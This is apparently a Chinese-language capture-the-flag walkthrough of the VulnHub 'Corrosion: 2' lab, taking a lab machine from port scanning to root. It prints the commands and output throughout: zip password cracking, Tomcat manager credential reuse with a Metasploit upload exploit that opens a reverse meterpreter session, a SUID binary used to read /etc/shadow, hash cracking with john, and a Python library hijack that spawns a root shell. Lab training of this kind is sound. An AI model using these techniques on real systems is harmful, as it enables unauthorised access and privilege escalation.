第307个VulnHub靶场演练攻略Corrosion: 2
第307个VulnHub靶场演练攻略Corrosion: 2
Proxy Programmer’s Corrosion: 2
一款 Vulnhub 中型机器。我们可以从这里下载该实验室https://www.vulnhub.com/entry/corrosion-2,745/#description。该实验室专为经验丰富的 CTF 玩家设计,旨在帮助他们在各种情况下测试自己的能力。那么,让我们开始吧,看看如何将内容分解成更小的模块。
网络扫描
首先,我们必须使用netdiscover命令扫描网络以查找目标机器的 IP 地址。
网络发现
在这种情况下,受害者的 IP 地址是192.168.74.128。
┌──(root㉿kali)-[~]
└─# netdiscover
Currently scanning: 172.23.193.0/16 | Screen View: Unique Hosts 265 Captured ARP Req/Rep packets, from 4 hosts. Total size: 15900 _____________________________________________________________________________IP At MAC Address Count Len MAC Vendor / Hostname -----------------------------------------------------------------------------192.168.74.1 00:50:56:c0:00:08 238 14280 VMware, Inc. 192.168.74.2 00:50:56:eb:d3:ae 12 720 VMware, Inc. 192.168.74.128 00:0c:29:ca:74:6c 11 660 VMware, Inc. 192.168.74.254 00:50:56:ec:7b:ae 4 240 VMware, Inc.
我们将使用Nmap来帮助我们推进这个过程。要查看所有已声明的服务,我们需要知道哪些服务现在可用。
nmap -sV 192.168.74.128
┌──(kali㉿kali)-[~]
└─$ nmap -sV 192.168.74.128
Starting Nmap 7.93 ( https://nmap.org ) at 2025-05-18 07:01 EDT
Nmap scan report for 192.168.74.128
Host is up (0.00059s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8080/tcp open http Apache Tomcat 9.0.53
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.22 seconds
根据 nmap 输出,我们有:
端口 22 上有一个 SSH 服务器。
在端口 80 上,有一个 HTTP 服务(Apache 服务器)。
在端口 8080 上,Tomcat 服务器正在端口 8080 上运行。
枚举
我们先来看看80端口上的 http 服务。这没什么奇怪的,只是一个Apache 服务器页面而已。
接下来,我们查看了Tomcat 服务器,它正在监听8080端口。这是一个简单的页面,没有任何可疑之处。
我们在网站上没有发现任何有害内容。因此,为了进一步进行实验,我们使用dirb目录获取一些信息。太棒了!我们发现了一个包含备份 zip 文件的目录。
dirb http://192.168.74.128:8080/-X .php,.zip
┌──(kali㉿kali)-[~]
└─$ dirb http://192.168.74.128:8080/ -X .php,.zip-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Sun May 18 07:19:54 2025
URL_BASE: http://192.168.74.128:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php,.zip) | (.php)(.zip) [NUM = 2]-----------------GENERATED WORDS: 4612---- Scanning URL: http://192.168.74.128:8080/ ----+ http://192.168.74.128:8080/backup.zip (CODE:200|SIZE:33723) -----------------
END_TIME: Sun May 18 07:20:02 2025
DOWNLOADED: 9224 - FOUND: 1
然后使用wget命令下载备份 zip 文件。
──(kali㉿kali)-[~]
└─$
wget http://192.168.74.128:8080/backup.zip
unzip backup.zip
--2025-05-18 07:57:24-- http://192.168.74.128:8080/backup.zip
Connecting to 192.168.74.128:8080... connected.
HTTP request sent, awaiting response... 200
Length: 33723 (33K) [application/zip]
Saving to: ‘backup.zip’backup.zip 100%[================>] 32.93K --.-KB/s in 0s 2025-05-18 07:57:24 (352 MB/s) - ‘backup.zip’ saved [33723/33723]Archive: backup.zip
[backup.zip] catalina.policy password:
┌──(kali㉿kali)-[~]
└─$ sudo apt install fcrackzip
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:libfcgi-bin libnsl-dev libregexp-assemble-perl libtirpc-dev
Use 'sudo apt autoremove' to remove them.
Suggested packages:wordlist
The following NEW packages will be installed:fcrackzip
0 upgraded, 1 newly installed, 0 to remove and 1994 not upgraded.
Need to get 27.5 kB of archives.
After this operation, 81.9 kB of additional disk space will be used.
Get:1 http://free.nchc.org.tw/kali kali-rolling/main amd64 fcrackzip amd64 1.0-12 [27.5 kB]
Fetched 27.5 kB in 4s (6,759 B/s)
Selecting previously unselected package fcrackzip.
(Reading database ... 395193 files and directories currently installed.)
Preparing to unpack .../fcrackzip_1.0-12_amd64.deb ...
Unpacking fcrackzip (1.0-12) ...
Setting up fcrackzip (1.0-12) ...
Processing triggers for man-db (2.11.2-1) ...
Processing triggers for kali-menu (2023.1.7) ...
Scanning processes...
Scanning linux images... Running kernel seems to be up-to-date.No services need to be restarted.No containers need to be restarted.No user sessions are running outdated binaries.No VM guests are running outdated hypervisor (qemu) binaries on this host.
https://www.kali.org/tools/wordlists/
┌──(root㉿kali)-[~]
└─# ls -lh /usr/share/wordlists/
total 51M
lrwxrwxrwx 1 root root 26 Mar 10 2023 amass -> /usr/share/amass/wordlists
lrwxrwxrwx 1 root root 25 Mar 10 2023 dirb -> /usr/share/dirb/wordlists
lrwxrwxrwx 1 root root 30 Mar 10 2023 dirbuster -> /usr/share/dirbuster/wordlists
lrwxrwxrwx 1 root root 41 Mar 10 2023 fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
lrwxrwxrwx 1 root root 45 Mar 10 2023 fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
lrwxrwxrwx 1 root root 28 Mar 10 2023 john.lst -> /usr/share/john/password.lst
lrwxrwxrwx 1 root root 27 Mar 10 2023 legion -> /usr/share/legion/wordlists
lrwxrwxrwx 1 root root 46 Mar 10 2023 metasploit -> /usr/share/metasploit-framework/data/wordlists
lrwxrwxrwx 1 root root 41 Mar 10 2023 nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
-rw-r--r-- 1 root root 51M Feb 16 2023 rockyou.txt.gz
lrwxrwxrwx 1 root root 39 Mar 10 2023 sqlmap.txt -> /usr/share/sqlmap/data/txt/wordlist.txt
lrwxrwxrwx 1 root root 25 Mar 10 2023 wfuzz -> /usr/share/wfuzz/wordlist
lrwxrwxrwx 1 root root 37 Mar 10 2023 wifite.txt -> /usr/share/dict/wordlist-probable.txt┌──(root㉿kali)-[~]
└─# gunzip /usr/share/wordlists/rockyou.txt.gz┌──(root㉿kali)-[~]
└─# wc -l /usr/share/wordlists/rockyou.txt; ls -lah /usr/share/wordlists/rockyou.txt
14344392 /usr/share/wordlists/rockyou.txt
-rw-r--r-- 1 root root 134M Feb 16 2023 /usr/share/wordlists/rockyou.txt
接下来,我们将使用fcrackzip实用程序。这是一款轻量级的开源程序。
┌──(kali㉿kali)-[~]
└─$ fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zipPASSWORD FOUND!!!!: pw == @administrator_hi5然后,我们使用此密码解压备份 zip文件。我们尝试检查此备份 zip 文件中的每个文件。现在,我们正在检查tomcat 用户 xml文件。
┌──(kali㉿kali)-[~]
└─$ unzip backup.zip
Archive: backup.zip
[backup.zip] catalina.policy password: inflating: catalina.policy inflating: context.xml inflating: catalina.properties inflating: jaspic-providers.xml inflating: jaspic-providers.xsd inflating: logging.properties inflating: server.xml inflating: tomcat-users.xml inflating: tomcat-users.xsd inflating: web.xml ┌──(kali㉿kali)-[~]
└─$ ls
backup.zip jaspic-providers.xml server.xml
catalina.policy jaspic-providers.xsd Templates
catalina.properties lab tomcat-users.xml
context.xml logging.properties tomcat-users.xsd
Desktop Music Videos
Documents Pictures web.xml
Downloads Public┌──(kali㉿kali)-[~]
└─$ cat tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<!--Licensed to the Apache Software Foundation (ASF) under one or morecontributor license agreements. See the NOTICE file distributed withthis work for additional information regarding copyright ownership.The ASF licenses this file to You under the Apache License, Version 2.0(the "License"); you may not use this file except in compliance withthe License. You may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, softwaredistributed under the License is distributed on an "AS IS" BASIS,WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.See the License for the specific language governing permissions andlimitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"version="1.0">
<!--By default, no user is included in the "manager-gui" role requiredto operate the "/manager/html" web application. If you wish to use this app,you must define such a user - the username and password are arbitrary.Built-in Tomcat manager roles:- manager-gui - allows access to the HTML GUI and the status pages- manager-script - allows access to the HTTP API and the status pages- manager-jmx - allows access to the JMX proxy and the status pages- manager-status - allows access to the status pages onlyThe users below are wrapped in a comment and are therefore ignored. If youwish to configure one or more of these users for use with the manager webapplication, do not forget to remove the <!.. ..> that surrounds them. Youwill also need to set the passwords to something appropriate.
-->
<!--<user username="admin" password="<must-be-changed>" roles="manager-gui"/><user username="robot" password="<must-be-changed>" roles="manager-script"/>
-->
<!--The sample user and role entries below are intended for use with theexamples web application. They are wrapped in a comment and thus are ignoredwhen reading this file. If you wish to configure these users for use with theexamples web application, do not forget to remove the <!.. ..> that surroundsthem. You will also need to set the passwords to something appropriate.
-->
<!--<role rolename="tomcat"/><role rolename="role1"/><user username="tomcat" password="<must-be-changed>" roles="tomcat"/><user username="both" password="<must-be-changed>" roles="tomcat,role1"/><user username="role1" password="<must-be-changed>" roles="role1"/>--><role rolename="manager-gui"/>
<user username="manager" password="melehifokivai" roles="manager-gui"/><role rolename="admin-gui"/>
<user username="admin" password="melehifokivai" roles="admin-gui, manager-gui"/>
</tomcat-users>┌──(kali㉿kali)-[~]
└─$ 渗透
现在我们获得了凭证,就可以开始使用Metasploit进行攻击了。在这种情况下,使用Tomcat 漏洞利用程序是最佳选择。然后,提供所有需要的信息,一切就绪。如你所见,我们创建了一个meterpreter 会话。
msf6 exploit(multi/http/tomcat_mgr_upload) > set rhosts 192.168.74.128
rhosts => 192.168.74.128
msf6 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
rport => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set httpusername admin
httpusername => admin
msf6 exploit(multi/http/tomcat_mgr_upload) > set httppassword melehifokivai
httppassword => melehifokivai
msf6 exploit(multi/http/tomcat_mgr_upload) > exploit
我们刚刚将目录切换到了主目录。我们发现这个实验室里有两个用户,Jaye和Randy。我们切换到了用户jaye。
我们发现这个人有一个名为 .program 的插件,可以让我们定位任何文件。结果,我们用它找到了/etc/shadow 文件。轰!我们获取了本实验室所有用户的哈希值。
./look’'/etc/shadow
msf6 exploit(multi/http/tomcat_mgr_upload) > sessions Active sessions
===============Id Name Type Information Connection-- ---- ---- ----------- ----------1 meterpreter java/li tomcat @ corrosion 192.168.74.130:4444 ->nux 192.168.74.128:41308(192.168.74.128)msf6 exploit(multi/http/tomcat_mgr_upload) > sessions 1
[*] Starting interaction with 1...meterpreter > shell
Process 3 created.
Channel 3 created.
cd /homels
jaye
randy
cd jaye
ls -al
ls: cannot open directory '.': Permission denied
su jaye
Password: melehifokivai
ls
Desktop
Documents
Downloads
Files
Music
Pictures
Public
snap
Templates
Videos
ls Files
look
./look '' /etc/shadow
sh: 3: ./look: not found
look
usage: look [-bdf] [-t char] string [file ...]
look /etc/shadow^C
Terminate channel 3? [y/N] y
meterpreter > sessions 1
[*] Session 1 is already interactive.
meterpreter > id
[-] Unknown command: id
meterpreter > shell
Process 4 created.
Channel 4 created.pwd
/home
ls
jaye
randy
cd jaye
ls
ls: cannot open directory '.': Permission denied
su jaye
Password: melehifokivai
ls -al
total 84
drwxr-x--x 18 jaye jaye 4096 Sep 17 2021 .
drwxr-xr-x 4 root root 4096 Sep 17 2021 ..
-rw-r--r-- 1 root root 0 Sep 17 2021 .bash_history
-rw-r--r-- 1 jaye jaye 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 jaye jaye 3771 Feb 25 2020 .bashrc
drwx------ 12 jaye jaye 4096 Sep 17 2021 .cache
drwx------ 11 jaye jaye 4096 Sep 17 2021 .config
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Desktop
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Documents
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Downloads
drwxr-xr-x 2 root root 4096 Sep 17 2021 Files
drwx------ 3 jaye jaye 4096 Sep 17 2021 .gnupg
drwxr-xr-x 3 jaye jaye 4096 Sep 17 2021 .local
drwx------ 5 jaye jaye 4096 Sep 17 2021 .mozilla
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Music
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Pictures
-rw-r--r-- 1 jaye jaye 807 Feb 25 2020 .profile
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Public
drwxr-xr-x 3 jaye jaye 4096 Sep 17 2021 snap
drwx------ 2 jaye jaye 4096 Sep 17 2021 .ssh
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Templates
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Videos
cd file
sh: 2: cd: can't cd to file
cd files
sh: 3: cd: can't cd to files
ls
Desktop
Documents
Downloads
Files
Music
Pictures
Public
snap
Templates
Videos
ls -al
total 84
drwxr-x--x 18 jaye jaye 4096 Sep 17 2021 .
drwxr-xr-x 4 root root 4096 Sep 17 2021 ..
-rw-r--r-- 1 root root 0 Sep 17 2021 .bash_history
-rw-r--r-- 1 jaye jaye 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 jaye jaye 3771 Feb 25 2020 .bashrc
drwx------ 12 jaye jaye 4096 Sep 17 2021 .cache
drwx------ 11 jaye jaye 4096 Sep 17 2021 .config
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Desktop
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Documents
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Downloads
drwxr-xr-x 2 root root 4096 Sep 17 2021 Files
drwx------ 3 jaye jaye 4096 Sep 17 2021 .gnupg
drwxr-xr-x 3 jaye jaye 4096 Sep 17 2021 .local
drwx------ 5 jaye jaye 4096 Sep 17 2021 .mozilla
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Music
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Pictures
-rw-r--r-- 1 jaye jaye 807 Feb 25 2020 .profile
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Public
drwxr-xr-x 3 jaye jaye 4096 Sep 17 2021 snap
drwx------ 2 jaye jaye 4096 Sep 17 2021 .ssh
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Templates
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Videos
cd Files
ls
look
ls -al
total 24
drwxr-xr-x 2 root root 4096 Sep 17 2021 .
drwxr-x--x 18 jaye jaye 4096 Sep 17 2021 ..
---s--s--x 1 root root 14728 Sep 17 2021 look
look '' /etc/shadow
look: /etc/shadow: Permission denied
./look '' /etc/shadow
root:$6$fHvHhNo5DWsYxgt0$.3upyGTbu9RjpoCkHfW.1F9mq5dxjwcqeZl0KnwEr0vXXzi7Tld2lAeYeIio/9BFPjUCyaBeLgVH1yK.5OR57.:18888:0:99999:7:::
daemon:*:18858:0:99999:7:::
bin:*:18858:0:99999:7:::
sys:*:18858:0:99999:7:::
sync:*:18858:0:99999:7:::
games:*:18858:0:99999:7:::
man:*:18858:0:99999:7:::
lp:*:18858:0:99999:7:::
mail:*:18858:0:99999:7:::
news:*:18858:0:99999:7:::
uucp:*:18858:0:99999:7:::
proxy:*:18858:0:99999:7:::
backup:*:18858:0:99999:7:::
list:*:18858:0:99999:7:::我们复制用户randy 的哈希值并将其保存在名为 hash 的文件中。
┌──(kali㉿kali)-[~]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt 308hashUsing default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:10:03 16.10% (ETA: 10:52:34) 0g/s 4195p/s 4195c/s 4195C/s zakats..zak1259
0g 0:00:14:32 23.56% (ETA: 10:51:50) 0g/s 4094p/s 4094c/s 4094C/s srk1989..srisrimata
0g 0:00:17:14 28.19% (ETA: 10:51:17) 0g/s 4071p/s 4071c/s 4071C/s rock-o-mania..rock a cutie like me
07051986randy (randy)
1g 0:00:56:52 DONE (2025-05-18 10:47) 0.000293g/s 4082p/s 4082c/s 4082C/s 070552898..070511513
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 权限提升
现在,我们已经掌握了开始提权所需的所有信息。为了以用户randy 的身份通过 ssh 登录,
然后我们使用sudo -l工具检查了该用户的限制,发现它可以被Python 库劫持所利用。
┌──(kali㉿kali)-[~]
└─$ ssh randy@192.168.74.128
randy@192.168.74.128's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.11.0-34-generic x86_64)* Documentation: https://help.ubuntu.com* Management: https://landscape.canonical.com* Support: https://ubuntu.com/advantage19 updates can be applied immediately.
To see these additional updates run: apt list --upgradableThe list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.randy@corrosion:~$ sudo -l
[sudo] password for randy:
Sorry, try again.
[sudo] password for randy:
Matching Defaults entries for randy on corrosion:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser randy may run the following commands on corrosion:(root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.py
randy@corrosion:~$
randy@corrosion:~$ cat /home/randy/randombase64.py
import base64message = input("Enter your string: ")
message_bytes = message.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')print(base64_message)
randy@corrosion:~$
randombase64.py python代码可用于执行此劫持。它导入另一个名为 base64 的文件。
为了获取 base64 文件坐标,我们使用了locate命令。几秒钟后,我们就找到了它的坐标。我们调查了该文件的限制。利用这个文件,我们可以获得root 访问权限。
randy@corrosion:~$ locate base64
/home/randy/randombase64.py
/snap/core18/2128/usr/bin/base64
/snap/core18/2128/usr/lib/python3.6/base64.py
/snap/core18/2128/usr/lib/python3.6/__pycache__/base64.cpython-36.pyc
/snap/core18/2128/usr/lib/python3.6/email/base64mime.py
/snap/core18/2128/usr/lib/python3.6/email/__pycache__/base64mime.cpython-36.pyc
/snap/core18/2128/usr/lib/python3.6/encodings/base64_codec.py
/snap/core18/2128/usr/lib/python3.6/encodings/__pycache__/base64_codec.cpython-36.pyc
/snap/core18/2855/usr/bin/base64
/snap/core18/2855/usr/lib/python3.6/base64.py
/snap/core18/2855/usr/lib/python3.6/__pycache__/base64.cpython-36.pyc
/snap/core18/2855/usr/lib/python3.6/email/base64mime.py
/snap/core18/2855/usr/lib/python3.6/email/__pycache__/base64mime.cpython-36.pyc
/snap/core18/2855/usr/lib/python3.6/encodings/base64_codec.py
/snap/core18/2855/usr/lib/python3.6/encodings/__pycache__/base64_codec.cpython-36.pyc
/snap/gnome-3-34-1804/72/usr/lib/python2.7/base64.py
/snap/gnome-3-34-1804/72/usr/lib/python2.7/email/base64mime.py
/snap/gnome-3-34-1804/72/usr/lib/python2.7/encodings/base64_codec.py
/snap/gnome-3-34-1804/72/usr/lib/python3.6/base64.py
/snap/gnome-3-34-1804/72/usr/lib/python3.6/__pycache__/base64.cpython-36.pyc
/snap/gnome-3-34-1804/72/usr/lib/python3.6/email/base64mime.py
/snap/gnome-3-34-1804/72/usr/lib/python3.6/email/__pycache__/base64mime.cpython-36.pyc
/snap/gnome-3-34-1804/72/usr/lib/python3.6/encodings/base64_codec.py
/snap/gnome-3-34-1804/93/usr/lib/python2.7/base64.py
/snap/gnome-3-34-1804/93/usr/lib/python2.7/email/base64mime.py
/snap/gnome-3-34-1804/93/usr/lib/python2.7/encodings/base64_codec.py
/snap/gnome-3-34-1804/93/usr/lib/python3.6/base64.py
/snap/gnome-3-34-1804/93/usr/lib/python3.6/__pycache__/base64.cpython-36.pyc
/snap/gnome-3-34-1804/93/usr/lib/python3.6/email/base64mime.py
/snap/gnome-3-34-1804/93/usr/lib/python3.6/email/__pycache__/base64mime.cpython-36.pyc
/snap/gnome-3-34-1804/93/usr/lib/python3.6/encodings/base64_codec.py
/usr/bin/base64
/usr/lib/python3.8/base64.py
/usr/lib/python3.8/__pycache__/base64.cpython-38.pyc
/usr/lib/python3.8/email/base64mime.py
/usr/lib/python3.8/email/__pycache__/base64mime.cpython-38.pyc
/usr/lib/python3.8/encodings/base64_codec.py
/usr/lib/python3.8/encodings/__pycache__/base64_codec.cpython-38.pyc
/usr/share/man/man1/base64.1.gz
/usr/share/mime/application/x-spkac+base64.xml
randy@corrosion:~$ ls -la /usr/lib/python3.8/base64.py
-rwxrwxrwx 1 root root 20386 Sep 20 2021 /usr/lib/python3.8/base64.py
randy@corrosion:~$ 我们使用 nano 命令对这个base64 python 文件进行了一些修改。添加以下代码即可获取受害者机器的root 权限。
! /usr/bin/python3.8"""Base16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings"""# Modified 04-Oct-1995 by Jack Jansen to use binascii module
# Modified 30-Dec-2003 by Barry Warsaw to add full RFC 3548 support
# Modified 22-May-2007 by Guido van Rossum to use bytes everywhereimport re
import struct
import binascii
import os
os.system ("/bin/bash")
__all__ = [# Legacy interface exports traditional RFC 2045 Base64 encodings'encode', 'decode', 'encodebytes', 'decodebytes',# Generalized interface for other encodings'b64encode', 'b64decode', 'b32encode', 'b32decode','b16encode', 'b16decode',# Base85 and Ascii85 encodings'b85encode', 'b85decode', 'a85encode', 'a85decode',# Standard Base64 encoding'standard_b64encode', 'standard_b64decode',
import os
os.system ("/bin/bash")
导入操作系统
操作系统。系统(“/ bin / bash” )
我们现在正在协调这两个Python 文件的使用。轰!我们获得了 root 权限。我们立即将目录切换到root 权限,并在几秒钟内收到了root 标志。
randy@corrosion:~$ sudo /usr/bin/python3.8 /home/randy/randombase64.py
[sudo] password for randy:
root@corrosion:/home/randy# cd root
bash: cd: root: No such file or directory
root@corrosion:/home/randy# cd /root
root@corrosion:~# cat root.txt
2fdbf8d4f894292361d6c72c8e833a4b
root@corrosion:~# 这是一个非常棒的实验,包含大量信息,尤其是在枚举和提权方面。值得尝试积累 CTF 经验。希望本次演练能让你学到一些新的东西。